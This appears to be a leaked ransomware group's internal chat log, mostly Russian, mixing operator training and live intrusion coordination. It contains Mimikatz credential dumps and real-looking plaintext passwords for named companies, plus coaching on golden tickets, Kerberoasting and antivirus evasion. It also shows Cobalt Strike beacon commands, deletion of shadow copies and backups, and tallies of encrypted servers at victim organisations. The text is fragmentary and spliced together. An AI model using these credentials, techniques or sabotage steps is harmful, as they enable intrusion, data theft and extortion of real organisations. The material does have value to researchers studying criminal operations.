	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	CREDMAN:

Authentication Id: 0; 996 (000000:000003e4)
Session : Service from 0
User Name : HIH-D-22925
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : hih-d-22925$
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 997 (000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-19
	msv :
	tspkg:
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman:

Authentication Id : 0 ; 63722 (000000:0000f8ea)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-1
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	CREDMAN:

Authentication Id: 0; 63689 (000000:0000f8c9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : HIH-D-22925$
	 * Domain : cn.net.ntes
	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	CREDMAN:

Authentication Id: 0; 62665 (000000:0000f4c9)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID :
	MVS:
	 [00000003] Primary
	 * Username : HIH-D-22925
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a
	tspkg:
	wdigest:
	kerberos:
	ssp :
	credman:

Authentication Id: 0; 999 (000000:000003e7)
Session : UndefinedLogonType from 0
User Name : HIH-D-22925
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-18
	msv :
	tspkg:
	wdigest :
	 * Username : HIH-D-22925
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : hih-d-22925$
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman:

``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab374db304924054507dd9a9a5b513fd:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cab016c9f1758dc8dc18600415e33576:::

```ДА
```
这项请求将在域 cn.net.ntes 的域控制器处理。

组名 Domain Admins
注释 指定的域管理员

成员

-------------------------------------------------------------------------------
B6823 cnadmin H10151
luot ntes.cn sileiy
winbjplan
命令成功完成。


``Тогда не понимаю в чем проблема)Считаютсялаба/дедик не считаются?У нас нет виндыи?Она же виндоваявот такую штукуи https://github.com/quasar/Quasarтак, тогда возьмите на тесты empire))тул кит потестили))Нет.Нета какие были/есть?По каким @tl1Приветчто по задачам?птПриветВсем приветВстал┌─[input0@parrot]─[~]
└─╼ $ping helpdocpt.club
PING helpdocpt.club (162.0.237.18) 56(84) bytes of data.
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 msагадомен форума лежит?hiо приветвечер добрый:space_invader:ахахага
видимо феды им не дадут заплатить(ахахаха``
jana dare: what in the hell
HIDE
49 seconds ago
Support: Hello, are you ready to negotiate?
HIDE
47 seconds ago
jana dare: fuck off
HIDE

```судя по скрину в generalя не знаю)они федералам писалиэто хелсы?04 дапришли на ваш акк
у вас же user04 ?твои парни?pPUnKg2arjexHCi0b6xUm3djAKFrW38CnwoPCirPeZWxAeMRnUXr4Fa7DUxoxbKRспокдавай спокойной)ага)а я уже передам тару)прогони адюзерс через скрипт, в архив и его сюдапускатьпировать ваще не понимаю че происходит
самые простые действия могу делатьда и это был не вопросили*никаких вопросов)так, еще вопросы? иди могу идти?там в пределах суток все будета так залей на файлобменника ну похуй кину сюда ссыль с пасомдо 100 метров на сколько знаюлимита нету на размер?а сюда аплоадится нормально файло да?как приду передам тарукинь в офф сюдагыг
я тоже
сутки сижу ужезакину тебе архивчик да? а то тар молчита я уже умираю)окейага
сейчас посижу поделаю тогда твоим парсером еще пачечку того что переоткрыть можно+остальные?+++У всех личные кобы есть?:thumbsup:найдете ДА будем там двигаться дальшеближайшеие пару часов+пока работаем с matches+Возвращамсяприятного аппетитачерез пол часа продолжимхорошопол часаокей, сколько по времени? час?скорее да чем нет)перекус)нам не говорили за обеды в эти два днятак, у вас обед?пока нетеще вопросы?вы берете хеш krbtgt и делаете себе тикет на любого ДА и вы на коне)прошло Н времени, может даже на след день и у всех ДА сменили пароливы сняли дамп хешей с дксуть вот в чемв том числе и от ДА2) он позволят сделать токен от любого пользователя))1) если вы достали хеш от krbtgt, то у вас уже дампнут сам дк) не встречал случаев когда ге то на диске лежал бы файлик `хеш от krbtgt (не читать).txt`тоже хороший вопроса если мы достали хэш Krbtgt пользователя
мы ведь можем делать голден тикет, что с этим можно сделать?как и с ntlm хешами, вы кидаете в конфу - получаете пасскак только получил пасс сразу вам передал``
emeralmatherials.com
```
вот утвот был кеб
```
$EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012
``потому что слишком серьезный пасс и брут не берет)вот домены в архиве лежат, мы брали керберос, но закончить и без него вышло, это всё к неидентичности, окей. Ситауация, есть только керберос хэш, что с ним делать? Куда стучаться?уже лучше вопросокей, встречный вопрос, смысл доставать керберос хэши, если мы их не использовали ни разу?справки по модулям у вас нет? гита нет?да, знаний касательно векторов и того можно и нельзявам дают полезные модули, ваша задача их изучить, задокументировать, проверить использовать в практикахэто должны делать вызадача в другомя могу хоть по каждому модулю все раписатьесли вы не изучаете модули которые дают то какой смысл?https://cisoclub.ru/kerberoasting/может ты нам и скажешь?более детально, что за хеши, откуда, чьи, как они там оказались, почему они не везде одинаковые и т ддает то вывод в консольможно написать еще "дает то вывод в консоль")собирает хэши из памяти, как и все остальное, в принциперосто к слову, как работает invoke-kerberoast?и еще, чем лучше вы знаете как работает сама сеть вместе с Active Directory тем лучше понимание того, что можно в ней делатьмы вам даем только основу, показать что вот так можно делать, но не всегда обязательнотем лучше соображаете в контексте задачи всего векторапоэтому чем больше тренеруетесь делать юак байпас, искать себе сами модули под задачи на гите, читать гайды и т дкак и все остальное по сутиэто лечится только опытом)невнимательностьбывает по 3-6 раз тыкаете в надежде, что поменяетсявы не читаете выводы командможно тогда на время обеда добавить в наш арсинал больше тулзов ? по сидим некоторые поизучаем на обеде[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) из того что я увидел[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) ну даже привести прохождение игры в пример, в какой-нибудь зельде не можешь пройти загадку, глянул на ютубе прохождение и вот уже продвинулся
только здесь с анализом, послушать рассуждения, какие-то фичи у "набитой руки" прихватитьи потом будем разбирать новый материалпосле обеда еще вопросы на пару часовможете тогда пока на уйтине обговаривалосьу вас обед на час смещен? или вы уходите?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) такой же перебор модулей на основе условий стартовой среды, просто быстрее будет т к рука набита)2-5) для начала поискать аналоги команды на том же гите в c# .net приложении, потом сторонние модули которые можно импортировать и крайний случай - загрузить к себе на дедик этот модуль, взять исходный файл и перенести руками в папку модулей на целевой машине - выполнить нужные действия - почистить за собойразличия это понятно, просто неимоверно интересно глянуть на проходку хотя бы одной сети прям в полевых условиях с рассуждениями, а не как все в интернете на своей лабе без запинок2-3) собрать у себя ехе вариант и запустить тамеще вопросы?потому что вы дальше PE не ходили, но сегодня пойдем[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) уже на lp могут быть различия на стадии UAC например, на стадии отключения доменав контексте EA так вобще не было опытакстати, да, действительно бы крайне интересно посмотреть, как работает кто более професиональный чем мыне идентичны сесии, идентичны действия*понятное дело не идентичны, но алгоритм в разных контекстах примерно один и тот же
low priv - собрать то, что доступно
LA/System - мимик и прочие более серьёзные вещи
DA - кроме dcsync'a мы и не пользовались ничем
Просто для контекстов действия по сути идентичны, может мы работаем не как надо, а может так оно и естьну это понятно что ситуации различные бывают и всё жемы с вами не просто так расширяем арсенал, методы, структуризируемгде-то вас выкинет АВ за 5 минут любой активности и т дгде-то ничего из модулей вообще не сработаетгде то можно сбрутить kerberoast за 10 минутвы же понимаете что сессии далеко не идентичныда, от появления сессии до ДКкстати где 2 пользователя еще?вопрос на уровне "а что если бы сталин был жив сейчас "к примеру поднятие привелегий за средню жизнь одной сесии от 1 минуты до 4 часов?ну разок со стороны посмотретьчто делать после появления первой сесии?порядка действий чего?)ну порядка действийкаких именно действий?а будет ли проведён "мастер класс" с описанием действий?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) не знаю что именно тут расписывать - то, что требуется в контексте пользователя или привязано к нему (браузеры, winscp, putty etc) делаете из контекста пользователя, то что требует систем прав (хешдамп, logonpassword) из систем[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) пожалуста ответьте на вопростакое вполне можеть когда уже все перепробовали[ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) ни разу ей не пользовался, но она в любом случае должна быть у вас в арсенале по той причине, что возможно она станет последней уязвимостью, чтобы поднять права)у вас составлен mindmap и вы можете по пункту на котором вы сейчас искать нужную инфу[ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) зависит от задачи. если у вас вылетает сессия - вы смотрите какой АВ, если вам надо зайти по рдп на целевую машину - idletime, etcмаксимально полезная инфа это именно пароли и хеши, т к у вас как минимум будет словарь для брута, а как максимум уже от системы пытаться дотянуться до других хешей/паролейдля этого вы будете использовать сплоиты, юак байпасс, spoolsv и т ддасуть в том, что вы не сможете сделать хешдамп без систем прав верно?пароли, хешитак я поэтому и задал вопрос, на что обращать вниманиев винпис много инфы касаемо поднятия привилегий через dllhijack - эта техника вообще, насколько часто используется в ральной жизни? есть смысл на нее заморачиваться?плохо анализируете инфукак же тут оказался пароль...```
  Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com
  UserName :
  Password : Canada!75
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 1/21/2020 9:16:27 AM
``сходу открываем ваш ситбэлт на gpjконечно))ни разу в winPEAS и seatbelt пароли не попадались вродена эти вопросы отвечают модули вышевопрос в том где они и как их достатьмаксимальная польза - пароливот по наблюдениям, что вытаскивал из них в чат я, что было полезно и что стоило вытащить, что стоилоя имею ввиду помимо там списка шар, AV и прочего, что будет полезно вытащить?там все по категориям расписаносразу ссылка на сайт с описанием
```
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
``````
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) как вариант idletime чтобы проверить когда была последня активность пользователя перед тем как зайти по рдп2-1) получили ошибку - загуглили, со временем выучите популярные ошибки (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon)
2-2) на пароли и "интересные" файлы, которые могут содержать пароли. так же вы можете поискать внутренние порталы которые могут быть уязвимы (аля sql injection), что позволит вам открыть себе сессию уже на сервере
2-3) не понял вопроса
2-4) пока оставим вопрос
2-5) не понял вопроса
2-6) коба добавляет эту инфу, когда сканируете через portscan хосты и коба видит ОС, она автоматически добавит его в Targets, команда Hashdump добавит хеши и т дда, тип помимо дефолтных AdFInd и прочих сборщиков, что можно в low priv юзать?можно расписать по тулсам какие лучше использовать на каких контекстахпро 2-2 поддерживаю, может в `group` вместо `all` имет смысл указывать другое что-то в некоторых случаях?

То же про winPEAS, вывод гигантский, но что маскимально полезно вытаскивать?сначала вопросы по уже имеющимся знаниям и опытуок, тогда как понимать `разбирать нетворк` ?для начала поймем что значит `разбирать нетворк`, а там суть подхватите и уже будем разбирать векторы)ВладиславХолдинг в телеге говорил что нас учили разбирать нетворк, какие тулзы лучше использовать и в каких случаях (хотя бы парочку для более детального их изучения)по поводу 1, я могу предположить судя по тому как вы работаете, что вы после создания токенов не возвращаете себе изначальный контекст. А модули требуют запросы в домен`psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process`1) Это взято с PowerView через psinject :^), но дело в том, что она выскакивала и с Invoke-Kerberoast, и SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command.

I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) что за модуль?
2) все возможности на оф странице гита и там понятная справка)
3) psinject выполняет пш код в другом процесе, что исключает возможность убить сессию если исполнение пш кода детектится в системе
4) не знаю, никогда не использовал этот аргумент)
5) `execute-assembly /SharpChrome.exe logins /showall`1. Эта ошибка:

```
ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
В чём ее проблема? Как её обходить? Что она значит?


2. "рубеус более серьезный инструмент ;-)"
Какие у него ещё есть функции помимо asreproast и kerberoast?

В чём основная разница между powerpick и psinject, если вы говорите, что второе лучше первого,
но при этом вчера в PowerView первое отработало, в отличие от второго?

Какой смысл аргумента` /privileges:enable` у `wmic`, если указывать креды ЛА/ДА?

5. Как работать с SharpChrome, не SharpWeb, а именно Chrome. У него самая понятная справка, сколько попыток не было - тщетнотак ну что?20 минут подготовить списокпервый час будем разбирать общие вопросы касательно софта, векторов и т дhi:space_invader:Доброе утродоброй, ждем пока что, на этой недели получим и сесси и новый инструмент.шо по сессиям?всем добрый день )может на спэйс ворк креды найдучерез эту прогу он бэкапит только на комп, ищу в браузере может что будета проверь настройки облачной синхронизации пожалуйстаон бэкапин на san1?а посмотри плиз дату установки софталол)еще чуть-чуть``
Teemo[FILES]Administrator */4144|2021Feb02 02:03:39> idle
[Tasked beacon to run .NET program: IdleTime.exe
[+] host called home, sent: 111147 bytes
[+] received output:
  CurrentUser : FILES\Administrator
  Idletime : 08h:09m:20s:125ms (0 milliseconds)
```
пока нет)хочешь по рдп завалиться и посмотреть гуй?такое бывает, попробуйте с другой тачки кинутьПрокся как живая некоторые страницы по пять минут открываетадминку не нашли?)интересная штука``
Microsoft_WinInet_127.0.0.1:8888/Resilio Sync\OVERLAND\administrator 01 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 1d e4 39 cf 1d a3 58 45 b0 85 d2 13 e4 2f f1 8a 00 00 00 18 00 00 57 00 49 00 4e 00 45 00 54 00 43 00 72 00 65 00 64 00 00 03 66 00 00 c0 00 00 10 00 00 71 ea fe 67 c8 17 d9 2c 2e 12 e4 22 8c 22 43 02 00 00 00 04 80 00 00 a0 00 00 10 00 00 00 b5 19 a8 93 30 eb e3 90 7f 59 42 64 56 a9 7c 6b 30 00 00 00 dd bc 4f 35 c9 ac 00 f0 56 0a 70 a6 60 e4 c4 6d 18 6c 69 34 b7 bf db 4d e1 39 88 82 9b e4 79 1a d9 ca bc 53 b8 58 9b 97 f7 e7 c6 6a 09 d6 36 c0 14 00 00 00 b6 44 ee 96 18 c2 65 dc 9b 49 d4 dd 0f 06 a1 26 bb fb 32 9f
``````
http://10.69.0.22:5000/ --------------------------- nas
https://10.69.0.173/login.html ------------------------- idrac-HYPERVDEV2|PowerEdge R320
https://10.69.0.70/login.html --------------------------- idrac-7ND5CZ1 | PowerEdge R520

```в истории был ласт пасс, но кред не было, думал что его креды подойдут, написал что бы не залочить в будущем на ласт пасс был в его браузере?к `https://lastpass.com`куда?у Логана есть ласт пасс, но пароль `M@ythe4th!` не подошёл``
URL : https://mail.overland.com/
Username : overland\administrator
Password : Vi3wSon!c
``````
URL : https://id.atlassian.com/signup/welcome
Username : logan@overland.com
Password : M@ythe4th!
``````
URL : https://gravityzone.bitdefender.com/
Username : logan@overland.com
Password : M@ythe4th!
``````
10.69.26.205\OVR026-R002\R002 r002
10.69.0.242\TEST044-R002\R002 r002
2 домена из 3-4 пкда
в том домене уже работайте, как подготовите, я вам дам сессии из 2х прод доменов

``` там, получается, еще два домена?
видно только один трастсначала залезаете сюда и там уже работайте``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127

Ping statistics for 10.69.0.35:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum = 10ms, Average = 10ms

beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete
```user9tl2ot``
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
```вышли на связьзнаю что НАС)мало лиокейтам только директория документов была, остальные уже были пустыеэто же НАСони были пустыми или вы их почистили?``

 Directory of \\89.0.10.104\Music

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> ..
               0 File(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

[+] received output:
 Volume in drive \89.0.10.104\Pictures is Pictures
 Volume Serial Number is 8C90-29F2

 Directory of \\89.0.10.104\Pictures

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> ..
               0 file(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

beacon> shell dir \\89.0.10.104\Videos
[*] Tasked beacon to run: dir \\89.0.10.104\Videos
[+] host called home, sent: 55 bytes
[+] received output:
 Volume in drive \\89.0.10.104\Videos is Videos
 Volume Serial Number is 42A8-E058

 Directory of \\89.0.10.104\Videos

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> ..
               0 file(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

``просто либо они как то его откатили или мы не закрылион работал во время лока?я на нём под рдпне закрыт почему то``
dn:CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: FR-VIR2008-02
>distinguishedName: CN=FR-VIR2008-02,OU=Beaune Servers,OU=Beaune,OU=RTP,DC=rtpco,DC=local
>instanceType: 4
>whenCreated: 20170630081330.0Z
>whenChanged: 20201222161043.0Z
>uSNCreated: 3171670
>info: General
>uSNChanged: 7602866
>name: FR-VIR2008-02
>objectGUID: {1A3B911B-4323-4851-905A-C22EE5FB2BC5}
>userAccountControl: 4096
>codePage: 0
>countryCode: 0
>lastLogon: 131862572618621371
>localPolicyFlags: 0
>pwdLastSet: 132515171874060018
>primaryGroupID: 515
>objectSid: S-1-5-21-3928074412-3075804946-2887454908-18665
>accountExpires: 9223372036854775807
>logonCount: 0
>sAMAccountName: FR-VIR2008-02
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2008 R2 Standard
>operatingSystemVersion: 6.1 (7601)
>operatingSystemServicePack: Service Pack 1
>dNSHostName: FR-VIR2008-02.rtpco.local
``по рдп бы на сервер, замапить диск и утилитой пройтисьсейчас зайдуоперативно``
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7

```работай через эту кобуа то отвалятсялучше не спавнитьтам вообще около 10 живых3056``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
```у меня нет живыхкинь её в меняни в какой кобе?больше никаких нет?и удалите теневые копизатерите там фриспейс после удаления бэкапатут кто нибудь 1 нуженпометочку сделал)
спасиболадно раз удали похуйда``
beacon> help mv
Use: mv [source file] [dest file]

Move source file to the specified destination
beacon> help cp
Use: cp [source file] [dest file]

Copy source file to the specified destination
```и cp вродекоба кст тоже умеела в mvдаты про del?shell del жетакпросто rm в кобе работает а shell rm не даётокей интересно....прикол в том что через команду не даёт удалить, а вот через гуй всё норм удаляетно странная хуйня что не дает менять но дает удалять)))проверьте остальные папкисносиаксес из дэнайдя не могу понять что за хрень, копи мув не работают, а вот снести сноситсяоектам мб вы их move куда нибудь и заширфуете?дасерьезно?+а дает?а может просто удалить их и не париться ?который на насеперезапишет его?echo 1 > файл бэкапа самый старый[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=skgH6wEiuWraA93mM) это[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=9iffb4WttEQtYmzbk) Даостальные файлы тоже заняты процессами?как я понял, нет прав на эти файлы
на запись то туда естьу меня тоже на 2-х типах эта шибкатак что?или только 1 последнего?у всех эта ошибка?а чего удивляесь что не сработало)akses iz denaidпереименовали?@tl2 говорил что зависит от редакции + он говорил что он защищает процесс а вы делали это через мап[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=X6jW2zvhB4xZy4DAc) .тут был каспер на армах?Заглотил прям по саму раму))))говорил же хуйца хряпает каспер)) @tl2допишите им то самое расширениеа переименуйте файлы на насеа повторный запуск на серверах где проецс не закончил?все 5 живы до сих пор[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=CLumsmxBztKP6w9pw) ужеееи оттуда запуститеили на арм живойна сервер где есть сессияв старых всё норм шифровало и видно было к сежится, а как будто сук терминаторзамапте этот наснет, там вроде все было подобное что только часть файлов закрывалась?в старых сетяхвсмысле так же ?[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=zaEjaabka5bHD9ZZM) ?вот видишь, только что залилв данный момент есть?ну я закидывал туда файл с ДК под кредами и сервака под другими кредами (креды и тачки с разных доменов)доступ на запись точно есть?вчера я его мапил на 2 тачки, сегодня проверив замапил ещё на 3 и запустил повторно на 5-ти тачкахдо этог было так же?+ ДКна 5 разных тачкахнас где был замаплен?остальные все живынан их был мап?ну несколько тачек отлетело[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=huJe2tEuab32Xa7C9)?файл 300 кбесли будет написано что он битый то окоткрываетсяи откройте егокоторый не закрытзаберите 1 док файлобрыва сессий не было?VirtualAlloc видит и всепалятся сами принципы инжектированияи по итогу у тебя сессия есть
но даже В НЕ ничего не заинжектитьдаже малварный процес)как только процес создается - каспер начинает его защищатьясното есть ты "создаешь" процес а не внедряешься в другойон стейджинг канал из своего файла же налаживаетбикон "в себе "нета бикон разве не заинжекчен?а инжектится не даст никак (ну вот запуск бинаря он пропустить может если вычищено нормальнону вопрос редакции там исключительноНиразу не встречал его, а скасперам даже комета на ура пролитает)))плюс он стартуется onboot его хрен прибьешьсесию пропустит
но заинжектить не дастнет, каспер именно
очень зол в правильной там от редакции зависитРазве не битдефендеъна админском компе стоялсамый сильный авер это каспер в плане мем интегритимб опять путаетекаспер или касея?каспер мы не обойдем инжектомблять
каспер это плохонакрутили ему защиту что лисимантик чет в последнее время кусачий сталТут же каспер индерпонт на некоторых чтиоялсамантек - очень грозныйа что в вилсоне с авером?и по 1 на 2 другие)3 человека будут с ним работатьтак что с вилнсонарт не все так просто)у нас проблемы вилсонарт
там 6 трастов ещевсезде есть доступ, но либо дл крашится, либо траф блочитсядаесть еще две с правами+ еще 2или новые подоспеют?так осталась же только #wilsonart-comна завтра планируется 3 сетки за день)завтра к 51.done.rtpcompany.comзавтра ко скольки?молодцывсенеплохое ЕДР решение и так бесполезно проболталось в сетито что кассея соснула это прям как бальзам)```
winona.rtpco.local
118 тачек по ад
64 армов на винде (10 живых)
53 сервера (71 живой)
всё притянуто и вся пошифровано
``отличноимелось ввиду не подтянулось, но замаплены и крит процесы убиты
```
Не подтянулось 8 серверов
``us.alloypolymers.com
ЗАкрыто серверов 24 из 24
Армы подтянули все 23rtpco.local
ЗАкрыто серверов 64 из 65
Армы подтянули все 152
один дк отвалился\щас, он какую-то херню посчтиталсекундуне всясколько по адне всяэто не вся статазакрытыхпишите скколько было пингующихсяда, стату готовим``
rtpco.local
65 servakov
152 arma
```
```
us.alloypolymers.com
arm 23
serv 24
```
